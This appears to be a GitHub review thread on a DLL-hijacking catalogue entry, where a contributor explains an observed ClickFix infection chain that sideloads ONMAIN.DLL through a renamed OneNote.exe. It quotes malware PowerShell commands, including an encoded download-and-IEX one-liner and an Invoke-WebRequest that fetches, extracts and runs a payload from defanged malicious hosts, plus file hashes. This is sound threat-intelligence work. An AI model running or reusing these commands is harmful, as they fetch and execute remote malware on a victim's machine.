Conversation
wietze left a comment
Hey @polygonben, thanks for your first submission! Just one question from me, see below.
SHA256:
- '97597a20a5f03bc1dc0d4a4b75d0026dfad79291e33ea72103abf85d0e2c6f19'
Resources:
- https://www.virustotal.com/gui/file/73670defa750d0a09470356279494a0c947245229d283c42e7ef0f2b8427b847
What's the relevance of this hash in relation to onmain.dll?
This wasn't relevant. This was the binary that loaded onmain.dll
VirusTotal is showing it as a malicious mfc100u.dll rather than a trusted executable; I'm still confused as to what the relation is.
Hi,
I'm not too sure why I included it - it doesn't appear related at all. Here is the breakdown of the execution chain that led to the DLL hijacking:
Stage 1 (ClickFix):
"C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" /ep bypass /enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABzAGUAZQAuAGkAbwAvADcAagBwAGYAYwB1ACcAKQB8AEkARQBYAA== /W 1
(new-object Net.WebClient).DownloadString('hxxps://psee[.]io/7jpfcu')|IEX
Stage 2 (Further Pwsh):
We can see this URL redirects to a secondary domain to pull back the 2nd-stage PowerShell payload:
hxxps://psee[.]io/7jpfcu -> redirects to -> cromatsfewbears.top/barbara/bens:
Invoke-WebRequest -Uri "hxxps://bitly[.]cx/XaqK" -OutFile "$env:TEMP\collectionreserch.zip"; Expand-Archive -Path "$env:TEMP\collectionreserch.zip" -DestinationPath "$env:TEMP"; & "$env:TEMP\s1clubcollection\C-Alp16.exe"
Stage 3 (Renamed OneNote.exe run)
We can see the URL redirects to:
hxxps://bitly[.]cx/XaqK -> redirects to -> hxxps://septembergoodwine[.]top/fatality/frenderic, downloading the .zip below:
collectionreserch.zip
MD5 (C-Alp16.exe) = 474ca98328d98ac1f8b4a0aa88b5dcf8 - Legitimate OneNote.exe
MD5 (Crookmutmoung.pgvk) = d41cd0f49d17aa1b9dc0a30fd78fd25a
MD5 (ONMAIN.DLL) = 702e8eb832e3831cadf42b4d725af23f -> Likely sideloaded!
MD5 (Pratshib.vi) = 448c6c7adeb8423f653f46d2f8e8230d
MD5 (msvcp90.dll) = 6d4e6fdb62660d81a6d7cd0144fa8fa4 - Legitimate
MD5 (msvcr90.dll) = ecbbed2f44afb22ba1f9ef8603c261b5 - Legitimate
Apologies for the above. I was trying to submit a new entry 'cscomp.yml' but I must be doing something seriously wrong.